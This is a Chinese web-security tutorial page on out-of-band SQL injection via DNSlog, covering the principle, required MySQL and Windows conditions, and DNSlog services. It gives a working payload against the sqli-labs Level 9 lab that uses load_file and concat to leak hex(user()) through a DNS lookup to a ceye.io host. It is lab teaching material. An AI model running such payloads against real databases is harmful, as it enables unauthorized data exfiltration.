当前位置: 首页 > article >正文

WEB安全--SQL注入--DNSlog外带

一、原理:

访问域名时,dns协议将我们访问的语句解析为ip地址,并将其记录在其日志中;在这个过程中,如果我们在语句中写入SQL注入的语句,那么在dns解析时会执行这些语句并通过concat将结果和域名一起记录在日志中,这时我们就能直接去日志中查看敏感信息。

二、条件:

1.mysql的my.ini文件中的secure_file_priv参数值要为空,secure_file_priv=""

2.用户的权限必须是root

3.网站是windows服务器,因为load_file()基于UNC格式读取,是windows系统特有的

三、网站:

DNSLog Platform

CEYE - Monitor service for security testing

登录 - DNSlog System

DNSLOG Platform

DNSLog Platform -- DNSLog

四、示例:

以sqli-labs第9关为例:

http://127.0.0.1/sqli-labs-master/Less-9/
?id=1' and (select load_file(concat('\\\\',(select hex(user())),'
.s5vuxg.ceye.io\\abc')))--+

因为一些字符不能直接回显在网页上,需要hex()转为十六进制

最后再转回来即可


http://www.kler.cn/a/589450.html

相关文章:

  • 时区转换工具
  • X86 RouterOS 7.18 设置笔记六:端口映射(IPv4、IPv6)及回流问题
  • 无SIM卡时代即将来临?eSIM才是智联未来?
  • 一键批量txt转DWG,DWG转txt——插件实现 CAD c#二次开发
  • 基于Flask的东方财富网股票数据可视化分析系统
  • 基于python的图书馆书目推荐数据分析与可视化-django+spider+vue
  • 直击行业痛点,赛逸展2025科技创新奖推陈出新
  • Flutter_学习记录_ ImagePicker拍照、录制视频、相册选择照片和视频、上传文件
  • PHP:从入门到进阶的编程之旅
  • 语言大模型的模型微调方法LoRA
  • Linux进程状态详解:僵尸进程与孤儿进程的深度探索与实践
  • idea如何新建springboot项目
  • OpenManus:无需邀请码的开源版Manus,开启自动化新纪元
  • 2024山东大学计算机复试上机真题
  • 50个常用的DeepSeek提示词
  • linux环境下快速输出电脑的系统/硬件/显卡/网络/已安装软件等信息
  • 查看IP地址/Ping 命令
  • 学习threejs,使用MeshLambertMaterial漫反射材质
  • 微服务》》Kubernetes (K8S)安装
  • 网络安全和文档的关系